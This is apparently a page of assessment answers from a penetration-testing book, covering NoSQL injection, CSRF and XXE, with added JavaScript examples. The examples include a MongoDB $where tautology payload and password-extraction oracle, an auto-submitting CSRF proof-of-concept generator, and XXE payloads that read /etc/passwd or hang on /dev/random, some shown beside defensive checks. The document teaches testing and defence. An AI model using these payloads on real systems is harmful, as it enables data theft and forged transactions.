Page 227 - Hands-On Bug Hunting for Penetration Testers
Assessment
6. The $where clause in MongoDB is particularly vulnerable to injection: its argument is a
JavaScript expression evaluated on the server, so any user input concatenated into it can
rewrite the logic of the query rather than just supply a value.
7. If you can induce some sort of noticeable behavior in a web application (such as a
long delay, or a different response for a true condition than for a false one), you can
combine that with comparison logic to enumerate sensitive information, typically one
character at a time.
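The two answers above taken together, as an added example that is not part of the book: a `$where` predicate built by string concatenation, the tautology that makes it match every document, and a boolean oracle (result or no result) used to recover a field character by character. No MongoDB instance is needed; `evalWhere()` is a stand-in for the server evaluating the `$where` JavaScript with each document bound to `this`. The collection, usernames and passwords are constructed for the example.

```javascript
// Added example: MongoDB $where injection and boolean-oracle enumeration.
// Constructed sample collection; every value is hypothetical.
const USERS = [
  { username: "alice", password: "s3cret!" },
  { username: "bob",   password: "hunter2" },
];

// Vulnerable: untrusted input is spliced straight into the JavaScript string
// that becomes the $where expression.
function buildWhereVulnerable(username) {
  return "this.username == '" + username + "'";
}

// Hardened: no $where at all. An equality filter object cannot change the
// structure of the query no matter what the value contains.
function buildFilterSafe(username) {
  return { username: String(username) };
}

// Stand-in for the server-side evaluation of a $where expression against
// each document (`this` is the document, as in MongoDB).
function evalWhere(expr, docs) {
  const predicate = new Function("return (" + expr + ");");
  return docs.filter((doc) => Boolean(predicate.call(doc)));
}

// Stand-in for running a plain equality filter.
function applyFilter(filter, docs) {
  return docs.filter((doc) =>
    Object.keys(filter).every((key) => doc[key] === filter[key]));
}

// Closes the string literal and ORs in an always-true comparison, so the
// predicate matches every document in the collection.
const TAUTOLOGY = "' || '1'=='1";

// Boolean oracle: the attacker only observes whether any row came back.
function oracle(username, injected) {
  return evalWhere(buildWhereVulnerable(username + injected), USERS).length > 0;
}

// Recover `username`'s password through the oracle, one position at a time.
// The alphabet is kept short here; a real run would cover all printable bytes.
function extractPassword(username, alphabet, maxLen) {
  let recovered = "";
  for (let i = 0; i < maxLen; i++) {
    let matched = false;
    for (const ch of alphabet) {
      // Resulting expression: this.username == 'alice' && this.password[i] == "c" && 'x'=='x'
      const payload = `' && this.password[${i}] == ${JSON.stringify(ch)} && 'x'=='x`;
      if (oracle(username, payload)) {
        recovered += ch;
        matched = true;
        break;
      }
    }
    if (!matched) break; // no character matched: we have reached the end of the secret
  }
  return recovered;
}
```

The same oracle works with a timing side channel instead of a result count: any payload that makes the true branch observably slower than the false branch gives the attacker the one bit per query that `extractPassword()` needs.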
Chapter 6
1. CSRF stands for Cross-Site Request Forgery. An attacker takes advantage of a
logged-in user's authenticated state (the browser attaches the session cookie to any
request it sends to the site) to make the victim's browser issue state-changing
requests the user never intended.
2. An attacker exploiting a CSRF vulnerability can trick a user into changing
application state against their will, or in a way they do not intend (for example,
routing money to a different bank account).
3. A CSRF PoC is just the bare-bones HTML markup necessary to recreate the form's HTTP
request: the method, the action URL, and every parameter the server expects.
4. If you can open a CSRF PoC in your browser while logged in to the target and submit it
successfully (the state change takes effect), that validates the vulnerability.
5. Using BeautifulSoup to generate HTML lets you avoid tedious string
manipulation (for example, splitting strings and inserting nested tags by hand).
6. We used a CSRF POST-based attack in our E2E example.
7. A malicious actor would use more hidden fields, leaving the victim control over as
little as possible of the data sent to the server (ideally only the act of loading the page).
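Answers 3, 6 and 7 above, as one added example that is not part of the book: a generator that turns a captured POST request into a CSRF proof of concept in which every parameter is a hidden field and the form submits itself on load, plus the check a tester wants before trying it in the browser: whether the request carries a parameter that looks like an anti-CSRF token (if the server validates it, a fixed value in the PoC will not succeed). It uses plain string building and the standard `URLSearchParams` class rather than BeautifulSoup. The target URL and request body are constructed for the example.

```javascript
// Added example: build a POST-based CSRF PoC from a captured request.
// Constructed sample: target and body of a state-changing request. The host
// and parameter names are hypothetical.
const TARGET_URL = "https://bank.example/transfer";
const CAPTURED_BODY = "account_id=1337&routing=021000021&amount=500.00&memo=rent";

// Substrings that usually indicate an anti-CSRF token parameter.
const TOKEN_HINTS = ["csrf", "token", "nonce", "authenticity"];

// Escape a value for use inside a double-quoted HTML attribute.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Parse an application/x-www-form-urlencoded body into ordered [name, value] pairs.
function parseBody(body) {
  return Array.from(new URLSearchParams(body).entries());
}

// Names of parameters that look like anti-CSRF tokens. A non-empty result
// means the PoC may need a fresh token per victim, or the endpoint is protected.
function findTokenFields(params) {
  return params
    .map(([name]) => name)
    .filter((name) => TOKEN_HINTS.some((hint) => name.toLowerCase().includes(hint)));
}

// Emit the PoC: a form whose action is the target, one hidden input per
// parameter (the victim controls none of the data), and an auto-submit.
function buildCsrfPoc(action, params, { autoSubmit = true } = {}) {
  const inputs = params.map(([name, value]) =>
    `    <input type="hidden" name="${escapeAttr(name)}" value="${escapeAttr(value)}">`);
  const lines = [
    "<!DOCTYPE html>",
    "<html><body>",
    `  <form id="poc" action="${escapeAttr(action)}" method="POST">`,
    ...inputs,
    '    <input type="submit" value="Continue">',
    "  </form>",
  ];
  if (autoSubmit) {
    lines.push('  <script>document.getElementById("poc").submit();</script>');
  }
  lines.push("</body></html>");
  return lines.join("\n");
}
```

Open the generated file in a browser that already holds a session for the target; with `autoSubmit` left on, simply loading the page replays the request, which is the condition answer 4 describes.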
Chapter 7
1. An example of an XML parser misconfiguration that leaves a PHP application
susceptible to XXE is parsing untrusted XML without first calling
libxml_disable_entity_loader(true), which leaves the loading of external entities
enabled. (Newer libxml versions disable external entity loading by default and the
function is deprecated as of PHP 8.0; the other common mistake is passing the
LIBXML_NOENT option, which turns entity substitution on.)
2. Using the Burp Proxy Intercept feature is key to submitting XML injection
snippets: you hold the legitimate XML request and edit its body before forwarding it
to the server.
3. XXE vulnerabilities can allow an attacker to read sensitive files from the
server, cause a denial of service against the application, or sometimes achieve remote
code execution.
4. /dev/random is a special device file on Unix-like systems that acts as a
(pseudo)random number generator. It never reaches end-of-file and can block until
enough entropy is available, so an external entity pointing at it can keep the parser
reading indefinitely.
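Answers 3 and 4 above, as an added example that is not part of the book: the shape of the two XXE payloads behind those impacts (file disclosure and the /dev/random hang), and a pre-parse check that refuses any untrusted document carrying a DOCTYPE and reports which external entities it declares. Rejecting DTDs outright is defence in depth for input that never legitimately needs one; it does not replace configuring the parser itself as answer 1 describes. The payload documents and element names are constructed for the example.

```javascript
// Added example: XXE payload shapes and a pre-parse DOCTYPE gate.
// Constructed payloads; element names are hypothetical.
const FILE_DISCLOSURE = `<?xml version="1.0"?>
<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<data><name>&xxe;</name></data>`;

// /dev/random never returns end-of-file and may block, so expanding this
// entity can keep the parser busy indefinitely (denial of service).
const DOS_DEV_RANDOM = `<?xml version="1.0"?>
<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///dev/random"> ]>
<data><name>&xxe;</name></data>`;

const BENIGN = `<?xml version="1.0"?>
<data><name>alice</name></data>`;

function hasDoctype(xml) {
  return /<!DOCTYPE\b/i.test(xml);
}

// Extract external entity declarations (SYSTEM or PUBLIC identifiers) from the
// internal DTD subset. Returns [] when there is no DOCTYPE or no subset.
function externalEntities(xml) {
  const doctype = xml.match(/<!DOCTYPE\b[^\[>]*(?:\[([\s\S]*?)\])?\s*>/i);
  if (!doctype || !doctype[1]) return [];
  const found = [];
  const entity =
    /<!ENTITY\s+(%\s*)?(\S+)\s+(?:SYSTEM|PUBLIC\s+(?:"[^"]*"|'[^']*'))\s*(?:"([^"]*)"|'([^']*)')/gi;
  let m;
  while ((m = entity.exec(doctype[1])) !== null) {
    found.push({
      name: m[2],
      parameter: Boolean(m[1]),            // "%" marks a parameter entity
      uri: m[3] !== undefined ? m[3] : m[4], // system identifier the parser would fetch
    });
  }
  return found;
}

// Gate to run on untrusted XML before it reaches a parser. Any DOCTYPE is
// rejected; the reason names the external entities so the event can be logged.
function checkUntrustedXml(xml) {
  if (!hasDoctype(xml)) return { accept: true, reason: "no DTD" };
  const entities = externalEntities(xml);
  if (entities.length > 0) {
    const list = entities.map((e) => `${e.name} -> ${e.uri}`).join(", ");
    return { accept: false, reason: "external entities: " + list };
  }
  return { accept: false, reason: "DTD present" };
}
```

The regex scanner is intentionally a coarse filter, not an XML parser: its job is to stop documents that should never contain a DTD, and to tell you which URI the payload pointed at when one arrives.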